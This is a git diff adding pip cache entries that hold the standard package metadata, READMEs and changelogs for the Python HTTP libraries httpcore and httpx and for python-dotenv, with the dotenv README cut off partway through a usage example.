b/code-server-config/.cache/pip/http-v2/9/3/6/e/f/936ef88052230050c9d8c803e64ef58ee62e7c4e4f61da74ba2ef008 differ diff --git a/code-server-config/.cache/pip/http-v2/9/3/6/e/f/936ef88052230050c9d8c803e64ef58ee62e7c4e4f61da74ba2ef008.body b/code-server-config/.cache/pip/http-v2/9/3/6/e/f/936ef88052230050c9d8c803e64ef58ee62e7c4e4f61da74ba2ef008.body new file mode 100755 index 0000000..8056834 --- /dev/null +++ b/code-server-config/.cache/pip/http-v2/9/3/6/e/f/936ef88052230050c9d8c803e64ef58ee62e7c4e4f61da74ba2ef008.body @@ -0,0 +1,625 @@ +Metadata-Version: 2.4 +Name: httpcore +Version: 1.0.9 +Summary: A minimal low-level HTTP client. +Project-URL: Documentation, https://www.encode.io/httpcore +Project-URL: Homepage, https://www.encode.io/httpcore/ +Project-URL: Source, https://github.com/encode/httpcore +Author-email: Tom Christie +License-Expression: BSD-3-Clause +License-File: LICENSE.md +Classifier: Development Status :: 3 - Alpha +Classifier: Environment :: Web Environment +Classifier: Framework :: AsyncIO +Classifier: Framework :: Trio +Classifier: Intended Audience :: Developers +Classifier: License :: OSI Approved :: BSD License +Classifier: Operating System :: OS Independent +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3 :: Only +Classifier: Programming Language :: Python :: 3.8 +Classifier: Programming Language :: Python :: 3.9 +Classifier: Programming Language :: Python :: 3.10 +Classifier: Programming Language :: Python :: 3.11 +Classifier: Programming Language :: Python :: 3.12 +Classifier: Topic :: Internet :: WWW/HTTP +Requires-Python: >=3.8 +Requires-Dist: certifi +Requires-Dist: h11>=0.16 +Provides-Extra: asyncio +Requires-Dist: anyio<5.0,>=4.0; extra == 'asyncio' +Provides-Extra: http2 +Requires-Dist: h2<5,>=3; extra == 'http2' +Provides-Extra: socks +Requires-Dist: socksio==1.*; extra == 'socks' +Provides-Extra: trio +Requires-Dist: trio<1.0,>=0.22.0; extra == 'trio' +Description-Content-Type: text/markdown + +# HTTP Core + +[![Test Suite](https://github.com/encode/httpcore/workflows/Test%20Suite/badge.svg)](https://github.com/encode/httpcore/actions) +[![Package version](https://badge.fury.io/py/httpcore.svg)](https://pypi.org/project/httpcore/) + +> *Do one thing, and do it well.* + +The HTTP Core package provides a minimal low-level HTTP client, which does +one thing only. Sending HTTP requests. + +It does not provide any high level model abstractions over the API, +does not handle redirects, multipart uploads, building authentication headers, +transparent HTTP caching, URL parsing, session cookie handling, +content or charset decoding, handling JSON, environment based configuration +defaults, or any of that Jazz. + +Some things HTTP Core does do: + +* Sending HTTP requests. +* Thread-safe / task-safe connection pooling. +* HTTP(S) proxy & SOCKS proxy support. +* Supports HTTP/1.1 and HTTP/2. +* Provides both sync and async interfaces. +* Async backend support for `asyncio` and `trio`. + +## Requirements + +Python 3.8+ + +## Installation + +For HTTP/1.1 only support, install with: + +```shell +$ pip install httpcore +``` + +There are also a number of optional extras available... + +```shell +$ pip install httpcore['asyncio,trio,http2,socks'] +``` + +## Sending requests + +Send an HTTP request: + +```python +import httpcore + +response = httpcore.request("GET", "https://www.example.com/") + +print(response) +# +print(response.status) +# 200 +print(response.headers) +# [(b'Accept-Ranges', b'bytes'), (b'Age', b'557328'), (b'Cache-Control', b'max-age=604800'), ...] +print(response.content) +# b'\n\n\nExample Domain\n\n\n ...' +``` + +The top-level `httpcore.request()` function is provided for convenience. In practice whenever you're working with `httpcore` you'll want to use the connection pooling functionality that it provides. + +```python +import httpcore + +http = httpcore.ConnectionPool() +response = http.request("GET", "https://www.example.com/") +``` + +Once you're ready to get going, [head over to the documentation](https://www.encode.io/httpcore/). + +## Motivation + +You *probably* don't want to be using HTTP Core directly. It might make sense if +you're writing something like a proxy service in Python, and you just want +something at the lowest possible level, but more typically you'll want to use +a higher level client library, such as `httpx`. + +The motivation for `httpcore` is: + +* To provide a reusable low-level client library, that other packages can then build on top of. +* To provide a *really clear interface split* between the networking code and client logic, + so that each is easier to understand and reason about in isolation. + +## Dependencies + +The `httpcore` package has the following dependencies... + +* `h11` +* `certifi` + +And the following optional extras... + +* `anyio` - Required by `pip install httpcore['asyncio']`. +* `trio` - Required by `pip install httpcore['trio']`. +* `h2` - Required by `pip install httpcore['http2']`. +* `socksio` - Required by `pip install httpcore['socks']`. + +## Versioning + +We use [SEMVER for our versioning policy](https://semver.org/). + +For changes between package versions please see our [project changelog](CHANGELOG.md). + +We recommend pinning your requirements either the most current major version, or a more specific version range: + +```python +pip install 'httpcore==1.*' +``` +# Changelog + +All notable changes to this project will be documented in this file. + +The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/). + +## Version 1.0.9 (April 24th, 2025) + +- Resolve https://github.com/advisories/GHSA-vqfr-h8mv-ghfj with h11 dependency update. (#1008) + +## Version 1.0.8 (April 11th, 2025) + +- Fix `AttributeError` when importing on Python 3.14. (#1005) + +## Version 1.0.7 (November 15th, 2024) + +- Support `proxy=…` configuration on `ConnectionPool()`. (#974) + +## Version 1.0.6 (October 1st, 2024) + +- Relax `trio` dependency pinning. (#956) +- Handle `trio` raising `NotImplementedError` on unsupported platforms. (#955) +- Handle mapping `ssl.SSLError` to `httpcore.ConnectError`. (#918) + +## 1.0.5 (March 27th, 2024) + +- Handle `EndOfStream` exception for anyio backend. (#899) +- Allow trio `0.25.*` series in package dependancies. (#903) + +## 1.0.4 (February 21st, 2024) + +- Add `target` request extension. (#888) +- Fix support for connection `Upgrade` and `CONNECT` when some data in the stream has been read. (#882) + +## 1.0.3 (February 13th, 2024) + +- Fix support for async cancellations. (#880) +- Fix trace extension when used with socks proxy. (#849) +- Fix SSL context for connections using the "wss" scheme (#869) + +## 1.0.2 (November 10th, 2023) + +- Fix `float("inf")` timeouts in `Event.wait` function. (#846) + +## 1.0.1 (November 3rd, 2023) + +- Fix pool timeout to account for the total time spent retrying. (#823) +- Raise a neater RuntimeError when the correct async deps are not installed. (#826) +- Add support for synchronous TLS-in-TLS streams. (#840) + +## 1.0.0 (October 6th, 2023) + +From version 1.0 our async support is now optional, as the package has minimal dependencies by default. + +For async support use either `pip install 'httpcore[asyncio]'` or `pip install 'httpcore[trio]'`. + +The project versioning policy is now explicitly governed by SEMVER. See https://semver.org/. + +- Async support becomes fully optional. (#809) +- Add support for Python 3.12. (#807) + +## 0.18.0 (September 8th, 2023) + +- Add support for HTTPS proxies. (#745, #786) +- Drop Python 3.7 support. (#727) +- Handle `sni_hostname` extension with SOCKS proxy. (#774) +- Handle HTTP/1.1 half-closed connections gracefully. (#641) +- Change the type of `Extensions` from `Mapping[Str, Any]` to `MutableMapping[Str, Any]`. (#762) + +## 0.17.3 (July 5th, 2023) + +- Support async cancellations, ensuring that the connection pool is left in a clean state when cancellations occur. (#726) +- The networking backend interface has [been added to the public API](https://www.encode.io/httpcore/network-backends). Some classes which were previously private implementation detail are now part of the top-level public API. (#699) +- Graceful handling of HTTP/2 GoAway frames, with requests being transparently retried on a new connection. (#730) +- Add exceptions when a synchronous `trace callback` is passed to an asynchronous request or an asynchronous `trace callback` is passed to a synchronous request. (#717) +- Drop Python 3.7 support. (#727) + +## 0.17.2 (May 23th, 2023) + +- Add `socket_options` argument to `ConnectionPool` and `HTTProxy` classes. (#668) +- Improve logging with per-module logger names. (#690) +- Add `sni_hostname` request extension. (#696) +- Resolve race condition during import of `anyio` package. (#692) +- Enable TCP_NODELAY for all synchronous sockets. (#651) + +## 0.17.1 (May 17th, 2023) + +- If 'retries' is set, then allow retries if an SSL handshake error occurs. (#669) +- Improve correctness of tracebacks on network exceptions, by raising properly chained exceptions. (#678) +- Prevent connection-hanging behaviour when HTTP/2 connections are closed by a server-sent 'GoAway' frame. (#679) +- Fix edge-case exception when removing requests from the connection pool. (#680) +- Fix pool timeout edge-case. (#688) + +## 0.17.0 (March 16th, 2023) + +- Add DEBUG level logging. (#648) +- Respect HTTP/2 max concurrent streams when settings updates are sent by server. (#652) +- Increase the allowable HTTP header size to 100kB. (#647) +- Add `retries` option to SOCKS proxy classes. (#643) + +## 0.16.3 (December 20th, 2022) + +- Allow `ws` and `wss` schemes. Allows us to properly support websocket upgrade connections. (#625) +- Forwarding HTTP proxies use a connection-per-remote-host. Required by some proxy implementations. (#637) +- Don't raise `RuntimeError` when closing a connection pool with active connections. Removes some error cases when cancellations are used. (#631) +- Lazy import `anyio`, so that it's no longer a hard dependancy, and isn't imported if unused. (#639) + +## 0.16.2 (November 25th, 2022) + +- Revert 'Fix async cancellation behaviour', which introduced race conditions. (#627) +- Raise `RuntimeError` if attempting to us UNIX domain sockets on Windows. (#619) + +## 0.16.1 (November 17th, 2022) + +- Fix HTTP/1.1 interim informational responses, such as "100 Continue". (#605) + +## 0.16.0 (October 11th, 2022) + +- Support HTTP/1.1 informational responses. (#581) +- Fix async cancellation behaviour. (#580) +- Support `h11` 0.14. (#579) + +## 0.15.0 (May 17th, 2022) + +- Drop Python 3.6 support (#535) +- Ensure HTTP proxy CONNECT requests include `timeout` configuration. (#506) +- Switch to explicit `typing.Optional` for type hints. (#513) +- For `trio` map OSError exceptions to `ConnectError`. (#543) + +## 0.14.7 (February 4th, 2022) + +- Requests which raise a PoolTimeout need to be removed from the pool queue. (#502) +- Fix AttributeError that happened when Socks5Connection were terminated. (#501) + +## 0.14.6 (February 1st, 2022) + +- Fix SOCKS support for `http://` URLs. (#492) +- Resolve race condition around exceptions during streaming a response. (#491) + +## 0.14.5 (January 18th, 2022) + +- SOCKS proxy support. (#478) +- Add proxy_auth argument to HTTPProxy. (#481) +- Improve error message on 'RemoteProtocolError' exception when server disconnects without sending a response. (#479) + +## 0.14.4 (January 5th, 2022) + +- Support HTTP/2 on HTTPS tunnelling proxies. (#468) +- Fix proxy headers missing on HTTP forwarding. (#456) +- Only instantiate SSL context if required. (#457) +- More robust HTTP/2 handling. (#253, #439, #440, #441) + +## 0.14.3 (November 17th, 2021) + +- Fix race condition when removing closed connections from the pool. (#437) + +## 0.14.2 (November 16th, 2021) + +- Failed connections no longer remain in the pool. (Pull #433) + +## 0.14.1 (November 12th, 2021) + +- `max_connections` becomes optional. (Pull #429) +- `certifi` is now included in the install dependancies. (Pull #428) +- `h2` is now strictly optional. (Pull #428) + +## 0.14.0 (November 11th, 2021) + +The 0.14 release is a complete reworking of `httpcore`, comprehensively addressing some underlying issues in the connection pooling, as well as substantially redesigning the API to be more user friendly. + +Some of the lower-level API design also makes the components more easily testable in isolation, and the package now has 100% test coverage. + +See [discussion #419](https://github.com/encode/httpcore/discussions/419) for a little more background. + +There's some other neat bits in there too, such as the "trace" extension, which gives a hook into inspecting the internal events that occur during the request/response cycle. This extension is needed for the HTTPX cli, in order to... + +* Log the point at which the connection is established, and the IP/port on which it is made. +* Determine if the outgoing request should log as HTTP/1.1 or HTTP/2, rather than having to assume it's HTTP/2 if the --http2 flag was passed. (Which may not actually be true.) +* Log SSL version info / certificate info. + +Note that `curio` support is not currently available in 0.14.0. If you're using `httpcore` with `curio` please get in touch, so we can assess if we ought to prioritize it as a feature or not. + +## 0.13.7 (September 13th, 2021) + +- Fix broken error messaging when URL scheme is missing, or a non HTTP(S) scheme is used. (Pull #403) + +## 0.13.6 (June 15th, 2021) + +### Fixed + +- Close sockets when read or write timeouts occur. (Pull #365) + +## 0.13.5 (June 14th, 2021) + +### Fixed + +- Resolved niggles with AnyIO EOF behaviours. (Pull #358, #362) + +## 0.13.4 (June 9th, 2021) + +### Added + +- Improved error messaging when URL scheme is missing, or a non HTTP(S) scheme is used. (Pull #354) + +### Fixed + +- Switched to `anyio` as the default backend implementation when running with `asyncio`. Resolves some awkward [TLS timeout issues](https://github.com/encode/httpx/discussions/1511). + +## 0.13.3 (May 6th, 2021) + +### Added + +- Support HTTP/2 prior knowledge, using `httpcore.SyncConnectionPool(http1=False)`. (Pull #333) + +### Fixed + +- Handle cases where environment does not provide `select.poll` support. (Pull #331) + +## 0.13.2 (April 29th, 2021) + +### Added + +- Improve error message for specific case of `RemoteProtocolError` where server disconnects without sending a response. (Pull #313) + +## 0.13.1 (April 28th, 2021) + +### Fixed + +- More resiliant testing for closed connections. (Pull #311) +- Don't raise exceptions on ungraceful connection closes. (Pull #310) + +## 0.13.0 (April 21st, 2021) + +The 0.13 release updates the core API in order to match the HTTPX Transport API, +introduced in HTTPX 0.18 onwards. + +An example of making requests with the new interface is: + +```python +with httpcore.SyncConnectionPool() as http: + status_code, headers, stream, extensions = http.handle_request( + method=b'GET', + url=(b'https', b'example.org', 443, b'/'), + headers=[(b'host', b'example.org'), (b'user-agent', b'httpcore')] + stream=httpcore.ByteStream(b''), + extensions={} + ) + body = stream.read() + print(status_code, body) +``` + +### Changed + +- The `.request()` method is now `handle_request()`. (Pull #296) +- The `.arequest()` method is now `.handle_async_request()`. (Pull #296) +- The `headers` argument is no longer optional. (Pull #296) +- The `stream` argument is no longer optional. (Pull #296) +- The `ext` argument is now named `extensions`, and is no longer optional. (Pull #296) +- The `"reason"` extension keyword is now named `"reason_phrase"`. (Pull #296) +- The `"reason_phrase"` and `"http_version"` extensions now use byte strings for their values. (Pull #296) +- The `httpcore.PlainByteStream()` class becomes `httpcore.ByteStream()`. (Pull #296) + +### Added + +- Streams now support a `.read()` interface. (Pull #296) + +### Fixed + +- Task cancellation no longer leaks connections from the connection pool. (Pull #305) + +## 0.12.3 (December 7th, 2020) + +### Fixed + +- Abort SSL connections on close rather than waiting for remote EOF when using `asyncio`. (Pull #167) +- Fix exception raised in case of connect timeouts when using the `anyio` backend. (Pull #236) +- Fix `Host` header precedence for `:authority` in HTTP/2. (Pull #241, #243) +- Handle extra edge case when detecting for socket readability when using `asyncio`. (Pull #242, #244) +- Fix `asyncio` SSL warning when using proxy tunneling. (Pull #249) + +## 0.12.2 (November 20th, 2020) + +### Fixed + +- Properly wrap connect errors on the asyncio backend. (Pull #235) +- Fix `ImportError` occurring on Python 3.9 when using the HTTP/1.1 sync client in a multithreaded context. (Pull #237) + +## 0.12.1 (November 7th, 2020) + +### Added + +- Add connect retries. (Pull #221) + +### Fixed + +- Tweak detection of dropped connections, resolving an issue with open files limits on Linux. (Pull #185) +- Avoid leaking connections when establishing an HTTP tunnel to a proxy has failed. (Pull #223) +- Properly wrap OS errors when using `trio`. (Pull #225) + +## 0.12.0 (October 6th, 2020) + +### Changed + +- HTTP header casing is now preserved, rather than always sent in lowercase. (#216 and python-hyper/h11#104) + +### Added + +- Add Python 3.9 to officially supported versions. + +### Fixed + +- Gracefully handle a stdlib asyncio bug when a connection is closed while it is in a paused-for-reading state. (#201) + +## 0.11.1 (September 28nd, 2020) + +### Fixed + +- Add await to async semaphore release() coroutine (#197) +- Drop incorrect curio classifier (#192) + +## 0.11.0 (September 22nd, 2020) + +The Transport API with 0.11.0 has a couple of significant changes. + +Firstly we've moved changed the request interface in order to allow extensions, which will later enable us to support features +such as trailing headers, HTTP/2 server push, and CONNECT/Upgrade connections. + +The interface changes from: + +```python +def request(method, url, headers, stream, timeout): + return (http_version, status_code, reason, headers, stream) +``` + +To instead including an optional dictionary of extensions on the request and response: + +```python +def request(method, url, headers, stream, ext): + return (status_code, headers, stream, ext) +``` + +Having an open-ended extensions point will allow us to add later support for various optional features, that wouldn't otherwise be supported without these API changes. + +In particular: + +* Trailing headers support. +* HTTP/2 Server Push +* sendfile. +* Exposing raw connection on CONNECT, Upgrade, HTTP/2 bi-di streaming. +* Exposing debug information out of the API, including template name, template context. + +Currently extensions are limited to: + +* request: `timeout` - Optional. Timeout dictionary. +* response: `http_version` - Optional. Include the HTTP version used on the response. +* response: `reason` - Optional. Include the reason phrase used on the response. Only valid with HTTP/1.*. + +See https://github.com/encode/httpx/issues/1274#issuecomment-694884553 for the history behind this. + +Secondly, the async version of `request` is now namespaced as `arequest`. + +This allows concrete transports to support both sync and async implementations on the same class. + +### Added + +- Add curio support. (Pull #168) +- Add anyio support, with `backend="anyio"`. (Pull #169) + +### Changed + +- Update the Transport API to use 'ext' for optional extensions. (Pull #190) +- Update the Transport API to use `.request` and `.arequest` so implementations can support both sync and async. (Pull #189) + +## 0.10.2 (August 20th, 2020) + +### Added + +- Added Unix Domain Socket support. (Pull #139) + +### Fixed + +- Always include the port on proxy CONNECT requests. (Pull #154) +- Fix `max_keepalive_connections` configuration. (Pull #153) +- Fixes behaviour in HTTP/1.1 where server disconnects can be used to signal the end of the response body. (Pull #164) + +## 0.10.1 (August 7th, 2020) + +- Include `max_keepalive_connections` on `AsyncHTTPProxy`/`SyncHTTPProxy` classes. + +## 0.10.0 (August 7th, 2020) + +The most notable change in the 0.10.0 release is that HTTP/2 support is now fully optional. + +Use either `pip install httpcore` for HTTP/1.1 support only, or `pip install httpcore[http2]` for HTTP/1.1 and HTTP/2 support. + +### Added + +- HTTP/2 support becomes optional. (Pull #121, #130) +- Add `local_address=...` support. (Pull #100, #134) +- Add `PlainByteStream`, `IteratorByteStream`, `AsyncIteratorByteStream`. The `AsyncByteSteam` and `SyncByteStream` classes are now pure interface classes. (#133) +- Add `LocalProtocolError`, `RemoteProtocolError` exceptions. (Pull #129) +- Add `UnsupportedProtocol` exception. (Pull #128) +- Add `.get_connection_info()` method. (Pull #102, #137) +- Add better TRACE logs. (Pull #101) + +### Changed + +- `max_keepalive` is deprecated in favour of `max_keepalive_connections`. (Pull #140) + +### Fixed + +- Improve handling of server disconnects. (Pull #112) + +## 0.9.1 (May 27th, 2020) + +### Fixed + +- Proper host resolution for sync case, including IPv6 support. (Pull #97) +- Close outstanding connections when connection pool is closed. (Pull #98) + +## 0.9.0 (May 21th, 2020) + +### Changed + +- URL port becomes an `Optional[int]` instead of `int`. (Pull #92) + +### Fixed + +- Honor HTTP/2 max concurrent streams settings. (Pull #89, #90) +- Remove incorrect debug log. (Pull #83) + +## 0.8.4 (May 11th, 2020) + +### Added + +- Logging via HTTPCORE_LOG_LEVEL and HTTPX_LOG_LEVEL environment variables +and TRACE level logging. (Pull #79) + +### Fixed + +- Reuse of connections on HTTP/2 in close concurrency situations. (Pull #81) + +## 0.8.3 (May 6rd, 2020) + +### Fixed + +- Include `Host` and `Accept` headers on proxy "CONNECT" requests. +- De-duplicate any headers also contained in proxy_headers. +- HTTP/2 flag not being passed down to proxy connections. + +## 0.8.2 (May 3rd, 2020) + +### Fixed + +- Fix connections using proxy forwarding requests not being added to the +connection pool properly. (Pull #70) + +## 0.8.1 (April 30th, 2020) + +### Changed + +- Allow inherintance of both `httpcore.AsyncByteStream`, `httpcore.SyncByteStream` without type conflicts. + +## 0.8.0 (April 30th, 2020) + +### Fixed + +- Fixed tunnel proxy support. + +### Added + +- New `TimeoutException` base class. + +## 0.7.0 (March 5th, 2020) + +- First integration with HTTPX. diff --git a/code-server-config/.cache/pip/http-v2/a/0/3/e/7/a03e77d6fd1aff6b4ee6b34a140bd46cfb7fa1873254b62a2d30e9d7 b/code-server-config/.cache/pip/http-v2/a/0/3/e/7/a03e77d6fd1aff6b4ee6b34a140bd46cfb7fa1873254b62a2d30e9d7 new file mode 100755 index 0000000..78849c2 Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/a/0/3/e/7/a03e77d6fd1aff6b4ee6b34a140bd46cfb7fa1873254b62a2d30e9d7 differ diff --git a/code-server-config/.cache/pip/http-v2/a/0/3/e/7/a03e77d6fd1aff6b4ee6b34a140bd46cfb7fa1873254b62a2d30e9d7.body b/code-server-config/.cache/pip/http-v2/a/0/3/e/7/a03e77d6fd1aff6b4ee6b34a140bd46cfb7fa1873254b62a2d30e9d7.body new file mode 100755 index 0000000..b0d2b19 --- /dev/null +++ b/code-server-config/.cache/pip/http-v2/a/0/3/e/7/a03e77d6fd1aff6b4ee6b34a140bd46cfb7fa1873254b62a2d30e9d7.body @@ -0,0 +1,203 @@ +Metadata-Version: 2.3 +Name: httpx +Version: 0.28.1 +Summary: The next generation HTTP client. +Project-URL: Changelog, https://github.com/encode/httpx/blob/master/CHANGELOG.md +Project-URL: Documentation, https://www.python-httpx.org +Project-URL: Homepage, https://github.com/encode/httpx +Project-URL: Source, https://github.com/encode/httpx +Author-email: Tom Christie +License: BSD-3-Clause +Classifier: Development Status :: 4 - Beta +Classifier: Environment :: Web Environment +Classifier: Framework :: AsyncIO +Classifier: Framework :: Trio +Classifier: Intended Audience :: Developers +Classifier: License :: OSI Approved :: BSD License +Classifier: Operating System :: OS Independent +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3 :: Only +Classifier: Programming Language :: Python :: 3.8 +Classifier: Programming Language :: Python :: 3.9 +Classifier: Programming Language :: Python :: 3.10 +Classifier: Programming Language :: Python :: 3.11 +Classifier: Programming Language :: Python :: 3.12 +Classifier: Topic :: Internet :: WWW/HTTP +Requires-Python: >=3.8 +Requires-Dist: anyio +Requires-Dist: certifi +Requires-Dist: httpcore==1.* +Requires-Dist: idna +Provides-Extra: brotli +Requires-Dist: brotli; (platform_python_implementation == 'CPython') and extra == 'brotli' +Requires-Dist: brotlicffi; (platform_python_implementation != 'CPython') and extra == 'brotli' +Provides-Extra: cli +Requires-Dist: click==8.*; extra == 'cli' +Requires-Dist: pygments==2.*; extra == 'cli' +Requires-Dist: rich<14,>=10; extra == 'cli' +Provides-Extra: http2 +Requires-Dist: h2<5,>=3; extra == 'http2' +Provides-Extra: socks +Requires-Dist: socksio==1.*; extra == 'socks' +Provides-Extra: zstd +Requires-Dist: zstandard>=0.18.0; extra == 'zstd' +Description-Content-Type: text/markdown + +

+ HTTPX +

+ +

HTTPX - A next-generation HTTP client for Python.

+ +

+ + Test Suite + + + Package version + +

+ +HTTPX is a fully featured HTTP client library for Python 3. It includes **an integrated command line client**, has support for both **HTTP/1.1 and HTTP/2**, and provides both **sync and async APIs**. + +--- + +Install HTTPX using pip: + +```shell +$ pip install httpx +``` + +Now, let's get started: + +```pycon +>>> import httpx +>>> r = httpx.get('https://www.example.org/') +>>> r + +>>> r.status_code +200 +>>> r.headers['content-type'] +'text/html; charset=UTF-8' +>>> r.text +'\n\n\nExample Domain...' +``` + +Or, using the command-line client. + +```shell +$ pip install 'httpx[cli]' # The command line client is an optional dependency. +``` + +Which now allows us to use HTTPX directly from the command-line... + +

+ httpx --help +

+ +Sending a request... + +

+ httpx http://httpbin.org/json +

+ +## Features + +HTTPX builds on the well-established usability of `requests`, and gives you: + +* A broadly [requests-compatible API](https://www.python-httpx.org/compatibility/). +* An integrated command-line client. +* HTTP/1.1 [and HTTP/2 support](https://www.python-httpx.org/http2/). +* Standard synchronous interface, but with [async support if you need it](https://www.python-httpx.org/async/). +* Ability to make requests directly to [WSGI applications](https://www.python-httpx.org/advanced/transports/#wsgi-transport) or [ASGI applications](https://www.python-httpx.org/advanced/transports/#asgi-transport). +* Strict timeouts everywhere. +* Fully type annotated. +* 100% test coverage. + +Plus all the standard features of `requests`... + +* International Domains and URLs +* Keep-Alive & Connection Pooling +* Sessions with Cookie Persistence +* Browser-style SSL Verification +* Basic/Digest Authentication +* Elegant Key/Value Cookies +* Automatic Decompression +* Automatic Content Decoding +* Unicode Response Bodies +* Multipart File Uploads +* HTTP(S) Proxy Support +* Connection Timeouts +* Streaming Downloads +* .netrc Support +* Chunked Requests + +## Installation + +Install with pip: + +```shell +$ pip install httpx +``` + +Or, to include the optional HTTP/2 support, use: + +```shell +$ pip install httpx[http2] +``` + +HTTPX requires Python 3.8+. + +## Documentation + +Project documentation is available at [https://www.python-httpx.org/](https://www.python-httpx.org/). + +For a run-through of all the basics, head over to the [QuickStart](https://www.python-httpx.org/quickstart/). + +For more advanced topics, see the [Advanced Usage](https://www.python-httpx.org/advanced/) section, the [async support](https://www.python-httpx.org/async/) section, or the [HTTP/2](https://www.python-httpx.org/http2/) section. + +The [Developer Interface](https://www.python-httpx.org/api/) provides a comprehensive API reference. + +To find out about tools that integrate with HTTPX, see [Third Party Packages](https://www.python-httpx.org/third_party_packages/). + +## Contribute + +If you want to contribute with HTTPX check out the [Contributing Guide](https://www.python-httpx.org/contributing/) to learn how to start. + +## Dependencies + +The HTTPX project relies on these excellent libraries: + +* `httpcore` - The underlying transport implementation for `httpx`. + * `h11` - HTTP/1.1 support. +* `certifi` - SSL certificates. +* `idna` - Internationalized domain name support. +* `sniffio` - Async library autodetection. + +As well as these optional installs: + +* `h2` - HTTP/2 support. *(Optional, with `httpx[http2]`)* +* `socksio` - SOCKS proxy support. *(Optional, with `httpx[socks]`)* +* `rich` - Rich terminal support. *(Optional, with `httpx[cli]`)* +* `click` - Command line client support. *(Optional, with `httpx[cli]`)* +* `brotli` or `brotlicffi` - Decoding for "brotli" compressed responses. *(Optional, with `httpx[brotli]`)* +* `zstandard` - Decoding for "zstd" compressed responses. *(Optional, with `httpx[zstd]`)* + +A huge amount of credit is due to `requests` for the API layout that +much of this work follows, as well as to `urllib3` for plenty of design +inspiration around the lower-level networking details. + +--- + +

HTTPX is BSD licensed code.
Designed & crafted with care.

— 🦋 —

+ +## Release Information + +### Fixed + +* Reintroduced supposedly-private `URLTypes` shortcut. (#2673) + + +--- + +[Full changelog](https://github.com/encode/httpx/blob/master/CHANGELOG.md) diff --git a/code-server-config/.cache/pip/http-v2/a/b/0/c/9/ab0c951c13ffa0438821f87295bc6ff5ca5c6104a972107beff7ec14 b/code-server-config/.cache/pip/http-v2/a/b/0/c/9/ab0c951c13ffa0438821f87295bc6ff5ca5c6104a972107beff7ec14 new file mode 100755 index 0000000..fed1fc3 Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/a/b/0/c/9/ab0c951c13ffa0438821f87295bc6ff5ca5c6104a972107beff7ec14 differ diff --git a/code-server-config/.cache/pip/http-v2/a/b/0/c/9/ab0c951c13ffa0438821f87295bc6ff5ca5c6104a972107beff7ec14.body b/code-server-config/.cache/pip/http-v2/a/b/0/c/9/ab0c951c13ffa0438821f87295bc6ff5ca5c6104a972107beff7ec14.body new file mode 100755 index 0000000..ee29876 --- /dev/null +++ b/code-server-config/.cache/pip/http-v2/a/b/0/c/9/ab0c951c13ffa0438821f87295bc6ff5ca5c6104a972107beff7ec14.body @@ -0,0 +1,749 @@ +Metadata-Version: 2.4 +Name: python-dotenv +Version: 1.2.1 +Summary: Read key-value pairs from a .env file and set them as environment variables +Author-email: Saurabh Kumar +License-Expression: BSD-3-Clause +Project-URL: Source, https://github.com/theskumar/python-dotenv +Keywords: environment variables,deployments,settings,env,dotenv,configurations,python +Classifier: Development Status :: 5 - Production/Stable +Classifier: Programming Language :: Python +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3.9 +Classifier: Programming Language :: Python :: 3.10 +Classifier: Programming Language :: Python :: 3.11 +Classifier: Programming Language :: Python :: 3.12 +Classifier: Programming Language :: Python :: 3.13 +Classifier: Programming Language :: Python :: Implementation :: PyPy +Classifier: Intended Audience :: Developers +Classifier: Intended Audience :: System Administrators +Classifier: Operating System :: OS Independent +Classifier: Topic :: System :: Systems Administration +Classifier: Topic :: Utilities +Classifier: Environment :: Web Environment +Requires-Python: >=3.9 +Description-Content-Type: text/markdown +License-File: LICENSE +Provides-Extra: cli +Requires-Dist: click>=5.0; extra == "cli" +Dynamic: license-file + +# python-dotenv + +[![Build Status][build_status_badge]][build_status_link] +[![PyPI version][pypi_badge]][pypi_link] + +python-dotenv reads key-value pairs from a `.env` file and can set them as environment +variables. It helps in the development of applications following the +[12-factor](https://12factor.net/) principles. + +- [Getting Started](#getting-started) +- [Other Use Cases](#other-use-cases) + * [Load configuration without altering the environment](#load-configuration-without-altering-the-environment) + * [Parse configuration as a stream](#parse-configuration-as-a-stream) + * [Load .env files in IPython](#load-env-files-in-ipython) +- [Command-line Interface](#command-line-interface) +- [File format](#file-format) + * [Multiline values](#multiline-values) + * [Variable expansion](#variable-expansion) +- [Related Projects](#related-projects) +- [Acknowledgements](#acknowledgements) + +## Getting Started + +```shell +pip install python-dotenv +``` + +If your application takes its configuration from environment variables, like a 12-factor +application, launching it in development is not very practical because you have to set +those environment variables yourself. + +To help you with that, you can add python-dotenv to your application to make it load the +configuration from a `.env` file when it is present (e.g. in development) while remaining +configurable via the environment: + +```python +from dotenv import load_dotenv + +load_dotenv() # reads variables from a .env file and sets them in os.environ + +# Code of your application, which uses environment variables (e.g. from `os.environ` or +# `os.getenv`) as if they came from the actual environment. +``` + +By default, `load_dotenv()` will: + +- Look for a `.env` file in the same directory as the Python script (or higher up the directory tree). +- Read each key-value pair and add it to `os.environ`. +- **Not override** an environment variable that is already set, unless you explicitly pass `override=True`. + +To configure the development environment, add a `.env` in the root directory of your +project: + +``` +. +├── .env +└── foo.py +``` + +The syntax of `.env` files supported by python-dotenv is similar to that of Bash: + +```bash +# Development settings +DOMAIN=example.org +ADMIN_EMAIL=admin@${DOMAIN} +ROOT_URL=${DOMAIN}/app +``` + +If you use variables in values, ensure they are surrounded with `{` and `}`, like +`${DOMAIN}`, as bare variables such as `$DOMAIN` are not expanded. + +You will probably want to add `.env` to your `.gitignore`, especially if it contains +secrets like a password. + +See the section "File format" below for more information about what you can write in a +`.env` file. + +## Other Use Cases + +### Load configuration without altering the environment + +The function `dotenv_values` works more or less the same way as `load_dotenv`, except it +doesn't touch the environment, it just returns a `dict` with the values parsed from the +`.env` file. + +```python +from dotenv import dotenv_values + +config = dotenv_values(".env") # config = {"USER": "foo", "EMAIL": "foo@example.org"} +``` + +This notably enables advanced configuration management: + +```python +import os +from dotenv import dotenv_values + +config = { + **dotenv_values(".env.shared"), # load shared development variables + **dotenv_values(".env.secret"), # load sensitive variables + **os.environ, # override loaded values with environment variables +} +``` + +### Parse configuration as a stream + +`load_dotenv` and `dotenv_values` accept [streams][python_streams] via their `stream` +argument. It is thus possible to load the variables from sources other than the +filesystem (e.g. the network). + +```python +from io import StringIO + +from dotenv import load_dotenv + +config = 